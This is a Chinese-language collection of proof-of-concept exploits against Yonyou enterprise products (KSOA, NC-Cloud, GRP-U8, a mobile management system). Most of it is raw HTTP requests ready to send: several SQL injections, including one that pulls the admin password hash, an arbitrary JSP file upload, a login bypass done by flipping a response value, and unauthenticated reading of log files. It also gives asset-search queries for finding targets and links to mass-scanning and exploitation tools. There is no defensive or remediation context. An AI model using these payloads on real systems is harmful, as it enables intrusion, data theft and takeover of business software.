用友
目录
- 用友时空KSOA PayBill SQL注入漏洞 POC
- 移动管理系 统 uploadApk.do 任意文件上传漏洞
- 用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
- 用友时空 KSOATaskRequestServlet sql注入漏洞
- 用友文件服务器认证绕过
- 用友GRP-U8存在信息泄露
- 漏洞综合利用
用友时空KSOA PayBill SQL注入漏洞 POC
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 134
Accept-Encoding: gzip, deflate
Connection: close
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
移动管理系 统 uploadApk.do 任意文件上传漏洞
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host:
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im age/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition:form-data;name="downloadpath"; filename="a.jsp" Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
GET
/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))-
-+ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) 5bGx5rW35LmL5YWz
Accept-Encoding: gzip, deflate
Connection:
用友时空 KSOATaskRequestServlet sql注入漏洞
/servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1*&password=1,
用友文件服务器认证绕过
资产搜索:
app="用友-NC-Cloud" 或者是app="用友-NC-Cloud" && server=="Apache-Coyote/1.1"
POST数据包修改返回包 false改成ture就可以绕过登陆
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 10 Aug 2023 20:38:25 GMT
Connection: close
Content-Length: 17
{"login":"false"}
用友GRP-U8存在信息泄露
漏洞描述:友U8系统存可直接访问log日志,泄露敏感信息
批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/用友GRP-U8
GET /logs/info.log HTTP/1.1
漏洞综合利用
https://github.com/wgpsec/YongYouNcTool